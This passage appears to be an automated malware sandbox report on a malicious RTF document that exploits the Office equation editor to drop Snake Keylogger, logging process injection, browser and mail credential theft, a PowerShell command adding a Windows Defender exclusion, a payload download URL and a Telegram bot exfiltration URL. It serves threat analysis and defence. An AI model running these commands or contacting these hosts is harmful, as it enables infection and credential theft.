                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 2350000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 240000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 65B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 75B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 7730000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 8730000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 8DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 9DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: ADF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2556Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3790Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeWindow / User API: threadDelayed 9250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeWindow / User API: threadDelayed 569Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3276Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3472Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3644Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3688Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3688Thread sleep time: -7200000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3692Thread sleep count: 9250 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe TID: 3692Thread sleep count: 569 > 30Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3784Thread sleep time: -180000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory written: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe "C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeQueries volume information: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeQueries volume information: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate                  		NTDS1
                  Query Registry                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Process Discovery                  		SSH1
                  Input Capture                  		24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron31
                  Virtualization/Sandbox Evasion                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd111
                  Process Injection                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1545180 Sample: na.doc Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 41 Initial sample is an obfuscated RTF file 2->41 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 24 other signatures 2->47 8 WINWORD.EXE 291 18 2->8         started        process3 file4 27 C:\Users\user\Desktop\~$na.doc, data 8->27 dropped 11 EQNEDT32.EXE 11 8->11         started        16 EQNEDT32.EXE 8->16         started        process5 dnsIp6 39 87.120.84.38, 49161, 80 SHARCOM-ASBG Bulgaria 11->39 29 C:\Users\user\...\cdlpohayugo39567.exe, PE32 11->29 dropped 31 C:\Users\user\...\qHbynE8Vgwabsy3[1].exe, PE32 11->31 dropped 67 Office equation editor establishes network connection 11->67 69 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->69 18 cdlpohayugo39567.exe 3 11->18         started        file7 signatures8 process9 signatures10 49 Multi AV Scanner detection for dropped file 18->49 51 Machine Learning detection for dropped file 18->51 53 Adds a directory exclusion to Windows Defender 18->53 55 Injects a PE file into a foreign processes 18->55 21 cdlpohayugo39567.exe 12 2 18->21         started        25 powershell.exe 4 18->25         started        process11 dnsIp12 33 reallyfreegeoip.org 21->33 35 api.telegram.org 21->35 37 9 other IPs or domains 21->37 57 Installs new ROOT certificates 21->57 59 Tries to steal Mail credentials (via file / registry access) 21->59 61 Tries to harvest and steal browser information (history, passwords, etc) 21->61 signatures13 63 Tries to detect the country of the analysis system (by using the IP) 33->63 65 Uses the Telegram API (likely for C&C communication) 35->65

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  na.doc45%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  na.doc100%AviraHEUR/Rtf.Malformed

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exe67%ReversingLabsWin32.Spyware.Snakekeylogger
                  C:\Users\user\AppData\Roaming\cdlpohayugo39567.exe67%ReversingLabsWin32.Spyware.Snakekeylogger

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://reallyfreegeoip.org0%URL Reputationsafe
                  http://checkip.dyndns.com0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		132.226.8.169
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/173.254.250.78false
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown
                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2010/30/2024%20/%2010:40:52%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                              		unknown
                              http://87.120.84.38/txt/qHbynE8Vgwabsy3.exetrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20acdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://duckduckgo.com/chrome_newtabcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfcdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.orgcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.telegram.org/botcdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeC:EQNEDT32.EXE, 00000002.00000003.403039735.0000000000610000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.403118978.0000000000610000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://ocsp.entrust.net03cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://tempuri.org/DataSet1.xsdEQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.drfalse
                                            		unknown
                                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.diginotar.nl/cps/pkioverheid0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://87.120.84.38/txt/qHbynE8Vgwabsy3.exettC:EQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://87.120.84.38/txt/qHbynE8Vgwabsy3.exeNEQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
